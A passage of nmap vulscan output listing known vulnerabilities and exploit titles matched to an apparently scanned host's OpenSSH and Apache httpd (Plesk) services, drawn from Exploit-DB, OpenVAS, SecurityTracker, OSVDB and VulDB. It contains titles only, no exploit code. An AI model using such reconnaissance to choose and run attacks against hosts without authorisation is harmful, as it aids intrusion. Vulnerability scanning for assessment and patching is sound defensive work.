3605| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
3606| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
3607| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
3608| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
3609| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
3610| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
3611| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
3612| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
3613|
3614| OpenVAS (Nessus) - http://www.openvas.org:
3615| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
3616| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
3617| [881183] CentOS Update for openssh CESA-2012:0884 centos6
3618| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
3619| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
3620| [870763] RedHat Update for openssh RHSA-2012:0884-04
3621| [870129] RedHat Update for openssh RHSA-2008:0855-01
3622| [861813] Fedora Update for openssh FEDORA-2010-5429
3623| [861319] Fedora Update for openssh FEDORA-2007-395
3624| [861170] Fedora Update for openssh FEDORA-2007-394
3625| [861012] Fedora Update for openssh FEDORA-2007-715
3626| [840345] Ubuntu Update for openssh vulnerability USN-597-1
3627| [840300] Ubuntu Update for openssh update USN-612-5
3628| [840271] Ubuntu Update for openssh vulnerability USN-612-2
3629| [840268] Ubuntu Update for openssh update USN-612-7
3630| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
3631| [840214] Ubuntu Update for openssh vulnerability USN-566-1
3632| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
3633| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
3634| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
3635| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
3636| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
3637| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
3638| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
3639| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
3640| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
3641| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
3642| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
3643| [100584] OpenSSH X Connections Session Hijacking Vulnerability
3644| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
3645| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
3646| [65987] SLES10: Security update for OpenSSH
3647| [65819] SLES10: Security update for OpenSSH
3648| [65514] SLES9: Security update for OpenSSH
3649| [65513] SLES9: Security update for OpenSSH
3650| [65334] SLES9: Security update for OpenSSH
3651| [65248] SLES9: Security update for OpenSSH
3652| [65218] SLES9: Security update for OpenSSH
3653| [65169] SLES9: Security update for openssh,openssh-askpass
3654| [65126] SLES9: Security update for OpenSSH
3655| [65019] SLES9: Security update for OpenSSH
3656| [65015] SLES9: Security update for OpenSSH
3657| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
3658| [61639] Debian Security Advisory DSA 1638-1 (openssh)
3659| [61030] Debian Security Advisory DSA 1576-2 (openssh)
3660| [61029] Debian Security Advisory DSA 1576-1 (openssh)
3661| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
3662| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
3663| [60667] Slackware Advisory SSA:2008-095-01 openssh
3664| [59014] Slackware Advisory SSA:2007-255-01 openssh
3665| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
3666| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
3667| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
3668| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
3669| [57492] Slackware Advisory SSA:2006-272-02 openssh
3670| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
3671| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
3672| [57470] FreeBSD Ports: openssh
3673| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
3674| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
3675| [56294] Slackware Advisory SSA:2006-045-06 openssh
3676| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
3677| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
3678| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
3679| [53788] Debian Security Advisory DSA 025-1 (openssh)
3680| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
3681| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
3682| [11343] OpenSSH Client Unauthorized Remote Forwarding
3683| [10954] OpenSSH AFS/Kerberos ticket/token passing
3684| [10883] OpenSSH Channel Code Off by 1
3685| [10823] OpenSSH UseLogin Environment Variables
3686|
3687| SecurityTracker - https://www.securitytracker.com:
3688| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
3689| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
3690| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
3691| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
3692| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
3693| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
3694| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
3695| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
3696| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
3697| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
3698| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
3699| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
3700| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
3701| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
3702| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
3703| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
3704| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
3705| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
3706| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
3707| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
3708| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
3709| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
3710| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
3711| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
3712| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
3713| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
3714| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
3715| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
3716| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
3717| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
3718| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
3719| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
3720| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
3721| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
3722| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
3723| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
3724| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
3725| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
3726|
3727| OSVDB - http://www.osvdb.org:
3728| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
3729| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
3730| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
3731| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
3732| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
3733| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
3734| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
3735| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
3736| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
3737| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
3738| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
3739| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
3740| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
3741| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
3742| [56921] OpenSSH Unspecified Remote Compromise
3743| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
3744| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
3745| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
3746| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
3747| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
3748| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
3749| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
3750| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
3751| [43745] OpenSSH X11 Forwarding Local Session Hijacking
3752| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
3753| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
3754| [37315] pam_usb OpenSSH Authentication Unspecified Issue
3755| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
3756| [34601] OPIE w/ OpenSSH Account Enumeration
3757| [34600] OpenSSH S/KEY Authentication Account Enumeration
3758| [32721] OpenSSH Username Password Complexity Account Enumeration
3759| [30232] OpenSSH Privilege Separation Monitor Weakness
3760| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
3761| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
3762| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
3763| [29152] OpenSSH Identical Block Packet DoS
3764| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
3765| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
3766| [22692] OpenSSH scp Command Line Filename Processing Command Injection
3767| [20216] OpenSSH with KerberosV Remote Authentication Bypass
3768| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
3769| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
3770| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
3771| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
3772| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
3773| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
3774| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
3775| [6601] OpenSSH *realloc() Unspecified Memory Errors
3776| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
3777| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
3778| [6072] OpenSSH PAM Conversation Function Stack Modification
3779| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
3780| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
3781| [5408] OpenSSH echo simulation Information Disclosure
3782| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
3783| [4536] OpenSSH Portable AIX linker Privilege Escalation
3784| [3938] OpenSSL and OpenSSH /dev/random Check Failure
3785| [3456] OpenSSH buffer_append_space() Heap Corruption
3786| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
3787| [2140] OpenSSH w/ PAM Username Validity Timing Attack
3788| [2112] OpenSSH Reverse DNS Lookup Bypass
3789| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
3790| [1853] OpenSSH Symbolic Link 'cookies' File Removal
3791| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
3792| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
3793| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
3794| [688] OpenSSH UseLogin Environment Variable Local Command Execution
3795| [642] OpenSSH Multiple Key Type ACL Bypass
3796| [504] OpenSSH SSHv2 Public Key Authentication Bypass
3797| [341] OpenSSH UseLogin Local Privilege Escalation
3798|_
379980/tcp open http Apache httpd (PleskLin)
3800|_http-server-header: Apache
3801| vulscan: VulDB - https://vuldb.com:
3802| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
3803| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
3804| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
3805| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
3806| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
3807| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
3808| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
3809| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
3810| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
3811| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
3812| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
3813| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
3814| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
3815| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
3816| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
3817| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
3818| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
3819| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
3820| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
3821| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
3822| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
3823| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
3824| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
3825| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
3826| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
3827| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
3828| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
3829| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
3830| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
3831| [138111] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Commons FileUpload unknown vulnerability
3832| [138103] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56/8.57 Apache WSS4J information disclosure
3833| [138053] Oracle JD Edwards EnterpriseOne Tools 9.2 Apache Log4j unknown vulnerability
3834| [138036] Oracle Insurance Rules Palette 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3835| [138035] Oracle Insurance Policy Administration J2EE 10.0/10.1/10.2/11.0 Apache Commons FileUpload unknown vulnerability
3836| [138034] Oracle Insurance Calculation Engine 9.7/10.0/10.1/10.2 Apache Commons FileUpload unknown vulnerability
3837| [138028] Oracle Identity Manager 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
3838| [138020] Oracle BI Publisher 11.1.1.9.0 Apache Tomcat unknown vulnerability
3839| [138019] Oracle BI Publisher (formerly XML Publisher) 11.1.1.9.0 Apache Tomcat unknown vulnerability
3840| [138017] Oracle Outside In Technology 8.5.4 Apache Commons FileUpload unknown vulnerability
3841| [138013] Oracle Outside In Technology 8.5.4 Apache Tomcat unknown vulnerability
3842| [138012] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3843| [138009] Oracle Outside In Technology 8.5.4 Apache HTTP Server unknown vulnerability
3844| [138008] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Struts 1 denial of service
3845| [138007] Oracle WebCenter Sites 12.2.1.3.0 Apache Tomcat denial of service
3846| [138006] Oracle Enterprise Repository 12.1.3.0.0 Apache CXF denial of service
3847| [138000] Oracle WebCenter Sites 12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3848| [137999] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Apache Commons FileUpload unknown vulnerability
3849| [137995] Oracle Hospitality Simphony 18.2.1 Apache WSS4J information disclosure
3850| [137987] Oracle FLEXCUBE Universal Banking up to 12.0.3/12.4.0/14.2.0 Apache Log4j unknown vulnerability
3851| [137981] Oracle Insurance IFRS 17 Analyzer 8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3852| [137980] Oracle Insurance Data Foundation 8.0.4/8.0.5/8.0.6/8.0.7 Apache Commons FileUpload unknown vulnerability
3853| [137979] Oracle 8.0.8 Apache Commons FileUpload unknown vulnerability
3854| [137973] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Batik unknown vulnerability
3855| [137970] Oracle Financial Services Profitability Management 8.0.4/8.0.5/8.0.6/8.0.7 Apache ActiveMQ unknown vulnerability
3856| [137967] Oracle up to 8.0.7 Apache httpd unknown vulnerability
3857| [137966] Oracle 8.0.7/8.0.8 Apache Groovy unknown vulnerability
3858| [137965] Oracle Financial Services Liquidity Risk Management 8.0.1/8.0.2/8.0.4/8.0.5/8.0.6 Apache Commons FileUpload unknown vulnerability
3859| [137964] Oracle 8.0.4/8.0.5/8.0.6/8.0.7 Apache Log4j unknown vulnerability
3860| [137933] Oracle Banking Platform up to 2.7.1 Apache Tika unknown vulnerability
3861| [137926] Oracle Enterprise Manager for Fusion Middleware 13.2/13.3 Apache Commons FileUpload information disclosure
3862| [137924] Oracle Enterprise Manager Base Platform 12.1.0.5.0/13.2.0.0.0/13.3.0.0.0 Apache Commons FileUpload unknown vulnerability
3863| [137914] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3864| [137913] Oracle E-Business Suite up to 12.2.8 Apache ActiveMQ unknown vulnerability
3865| [137911] Oracle E-Business Suite up to 12.2.8 Apache HTTP Server unknown vulnerability
3866| [137910] Oracle E-Business Suite up to 12.2.8 Apache CXF information disclosure
3867| [137909] Oracle E-Business Suite up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3868| [137905] Oracle Primavera Gateway 15.2/16.2/17.12/18.8 Apache Tika denial of service
3869| [137901] Oracle Primavera Unifier up to 18.8 Apache HTTP Server unknown vulnerability
3870| [137895] Oracle Instant Messaging Server 10.0.1.2.0 Apache Tika information disclosure
3871| [137894] Oracle EAGLE (Software) 46.5/46.6/46.7 Apache Tomcat information disclosure
3872| [137892] Oracle Online Mediation Controller 6.1 Apache Batik denial of service
3873| [137891] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Tomcat unknown vulnerability
3874| [137885] Oracle Diameter Signaling Router (DSR) 8.0/8.1/8.2 Apache cxf unknown vulnerability
3875| [137882] Oracle Unified 8.0.0.2.0 Apache Commons FileUpload unknown vulnerability
3876| [137881] Oracle Online Mediation Controller 6.1 Apache Commons FileUpload unknown vulnerability
3877| [137880] Oracle Interactive Session Recorder 6.0/6.1/6.2 Apache Log4j unknown vulnerability
3878| [137879] Oracle Convergence 3.0.2 Apache Commons FileUpload unknown vulnerability
3879| [137876] Oracle Application Session Controller 3.7.1/3.8.0 Apache Commons FileUpload unknown vulnerability
3880| [137829] Apache Roller 5.2.3 Math Comment Authenticator Reflected cross site scripting
3881| [137736] Apache Kafka 0.11.0.0/2.1.0 ACL Validation Request privilege escalation
3882| [136858] MakerBot Replicator 5G Printer Apache HTTP Server information disclosure
3883| [136849] Analogic Poste.io 2.1.6 on Apache RoundCube logs/ information disclosure
3884| [136822] Apache Tomcat up to 8.5.40/9.0.19 Incomplete Fix CVE-2019-0199 Resource Exhaustion denial of service
3885| [136808] Apache Geode up to 1.8.0 Secure Mode privilege escalation
3886| [136646] Apache Allura up to 1.10.x Dropdown Selector Stored cross site scripting
3887| [136374] Apache HTTP Server up to 2.4.38 Slash Regular Expression unknown vulnerability
3888| [136373] Apache HTTP Server 2.4.34/2.4.35/2.4.36/2.4.37/2.4.38 HTTP2 Request Crash denial of service
3889| [136372] Apache HTTP Server up to 2.4.38 HTTP2 Request unknown vulnerability
3890| [136370] Apache Fineract up to 1.2.x sql injection
3891| [136369] Apache Fineract up to 1.2.x sql injection
3892| [135731] Apache Hadoop up to 2.8.4/2.9.1/3.1.0 yarn privilege escalation
3893| [135664] Apache Tomcat up to 7.0.93/8.5.39/9.0.0.17 SSI printenv Command cross site scripting
3894| [135663] Apache Camel up to 2.23.x JSON-lib Library XML Data XML External Entity
3895| [135661] Apache Roller up to 5.2.1/5.2.0 XML-RPC Interface XML File Server-Side Request Forgery
3896| [135402] Apache Zookeeper up to 3.4.13/3.5.0-alpha to 3.5.4-beta getACL() information disclosure
3897| [135270] Apache JSPWiki up to 2.11.0.M3 Plugin Link cross site scripting
3898| [135269] Apache JSPWiki up to 2.11.0.M3 InterWiki Link cross site scripting
3899| [135268] Apache JSPWiki up to 2.11.0.M3 Attachment cross site scripting
3900| [134527] Apache Karaf up to 4.2.4 Config Service directory traversal
3901| [134416] Apache Sanselan 0.97-incubator Loop denial of service
3902| [134415] Apache Sanselan 0.97-incubator Hang denial of service
3903| [134291] Apache Axis up to 1.7.8 Server-Side Request Forgery
3904| [134290] Apache UIMA DUCC up to 2.2.2 cross site scripting
3905| [134248] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3906| [134247] Apache Archiva up to 2.2.3 Artifact Upload directory traversal
3907| [134246] Apache Camel up to 2.19/2.21.3/2.22.2/2.23.0 directory traversal
3908| [134138] Apache Pluto 3.0.0/3.0.1 Chat Room Demo Portlet cross site scripting
3909| [133992] Apache Qpid Proton up to 0.27.0 Certificate Validation Man-in-the-Middle weak authentication
3910| [133977] Apache Zeppelin up to 0.7.x Stored cross site scripting
3911| [133976] Apache Zeppelin up to 0.7.x Cron Scheduler privilege escalation
3912| [133975] Apache Zeppelin up to 0.7.2 Session Fixation weak authentication
3913| [133444] Apache PDFbox 2.0.14 XML Parser XML External Entity
3914| [133573] Oracle FLEXCUBE Private Banking 2.0.0.0/2.2.0.1/12.0.1.0/12.0.3.0/12.1.0.0 Apache ActiveMQ unknown vulnerability
3915| [133407] Apache Tomcat up to 7.0.93/8.5.39/9.0.17 on Windows JRE Command Line Argument Code Execution
3916| [133315] Apache Airflow up to 1.10.2 HTTP Endpoint cross site request forgery
3917| [133314] Apache Airflow up to 1.10.2 Metadata Database cross site scripting
3918| [133290] Apache Tomcat up to 8.5.37/9.0.14 HTTP2 Stream Execution denial of service
3919| [133112] Apache HTTP Server up to 2.4.38 mod_auth_digest race condition privilege escalation
3920| [133111] Apache HTTP Server 2.4.37/2.4.38 mod_ssl Bypass privilege escalation
3921| [133092] Airsonic 10.2.1 org.apache.commons.lang.RandomStringUtils RecoverController.java java.util.Random weak authentication
3922| [132568] Apache JSPWiki up to 2.11.0.M2 URL User information disclosure
3923| [132567] Apache JSPWiki up to 2.11.0.M2 URL cross site scripting
3924| [132566] Apache ActiveMQ up to 5.15.8 MQTT Frame Memory denial of service
3925| [132565] Apache HBase up to 2.1.3 REST Server Request privilege escalation
3926| [132183] Apache Mesos up to pre-1.4.x Docker Image Code Execution
3927| [131988] Apache Karaf up to 4.2.2 kar Deployer directory traversal
3928| [131859] Apache Hadoop up to 2.9.1 privilege escalation
3929| [131479] Apache Solr up to 7.6 HTTP GET Request Server-Side Request Forgery
3930| [131446] Apache Solr up to 5.0.5/6.6.5 Config API HTTP POST Request Code Execution
3931| [131385] Apache Qpid Broker-J up to 6.x/7.0.6/7.1.0 AMQP Command Crash denial of service
3932| [131315] Apache Mesos up to pre-1.4.x Mesos Masters Rendering JSON Payload Recursion denial of service
3933| [131236] Apache Airflow up to 1.10.1 Metadata Database cross site scripting
3934| [130755] Apache JSPWiki up to 2.10.5 URL cross site scripting
3935| [130629] Apache Guacamole Cookie Flag weak encryption
3936| [130628] Apache Hadoop up to 3.0.0 HDFS information disclosure
3937| [130529] Apache Subversion 1.10.0/1.10.1/1.10.2/1.10.3/1.11.0 mod_dav_svn Directory Crash denial of service
3938| [130353] Apache Open Office up to 4.1.5 Document Loader String memory corruption
3939| [130341] Apache HTTP Server 2.4.37 mod_ssl Loop denial of service
3940| [130330] Apache HTTP Server up to 2.4.37 mod_session Expired privilege escalation
3941| [130329] Apache HTTP Server 2.4.37 mod_http2 Slowloris denial of service
3942| [130212] Apache Airflow up to 1.10.0 LDAP Auth Backend Certificate weak authentication
3943| [130123] Apache Airflow up to 1.8.2 information disclosure
3944| [130122] Apache Airflow up to 1.8.2 command injection cross site request forgery
3945| [130121] Apache Airflow up to 1.8.2 Webserver Object Code Execution
3946| [129717] Oracle Secure Global Desktop 5.4 Apache HTTP Server denial of service
3947| [129688] Oracle Tape Library ACSLS 8.4 Apache Log4j unknown vulnerability
3948| [129673] Oracle Retail Returns Management 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3949| [129672] Oracle Retail Central Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3950| [129671] Oracle Retail Back Office 13.3/13.4/14.0/14.1 Apache Commons Fileupload unknown vulnerability
3951| [129574] Oracle Outside In Technology 8.5.3/8.5.4 Apache Tomcat denial of service
3952| [129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server denial of service
3953| [129563] Oracle Enterprise Repository 12.1.3.0.0 Apache Log4j unknown vulnerability
3954| [129555] Oracle Outside In Technology 8.5.3 Apache Batik denial of service
3955| [129551] Oracle Outside In Technology 8.5.3/8.5.4 Apache Commons FileUpload denial of service
3956| [129542] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
3957| [129538] Oracle SOA Suite 12.1.3.0.0/12.2.1.3.0 Apache Batik unknown vulnerability
3958| [129519] Oracle Enterprise Manager Ops Center 12.2.2/12.3.3 Apache ActiveMQ unknown vulnerability
3959| [129508] Oracle Applications Manager up to 12.2.8 Apache Derby unknown vulnerability
3960| [129507] Oracle Mobile Field Service up to 12.2.8 Apache Log4j unknown vulnerability
3961| [129505] Oracle Email Center up to 12.2.8 Apache Log4j unknown vulnerability
3962| [129504] Oracle CRM Technical Foundation up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3963| [129499] Oracle Partner Management up to 12.2.8 Apache Log4j unknown vulnerability
3964| [129498] Oracle Marketing up to 12.2.8 Apache Commons FileUpload unknown vulnerability
3965| [129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik unknown vulnerability
3966| [129479] Oracle Communications Diameter Signaling Router up to 8.2 Apache Batik unknown vulnerability
3967| [129474] Oracle Communications Diameter Signaling Router up to 8.2 Apache HTTP Server information disclosure
3968| [129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 unknown vulnerability
3969| [129470] Oracle Communications Converged Application Server up to 7.0.0.0 Apache Struts 1 unknown vulnerability
3970| [129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j unknown vulnerability
3971| [129461] Oracle Communications Services Gatekeeper up to 6.1.0.3.x Apache Commons Collections Fileupload unknown vulnerability
3972| [129460] Oracle Communications Service Broker 6.0 Apache Log4j unknown vulnerability
3973| [129459] Oracle Communications Policy Management up to 12.4 Apache Struts 2 unknown vulnerability
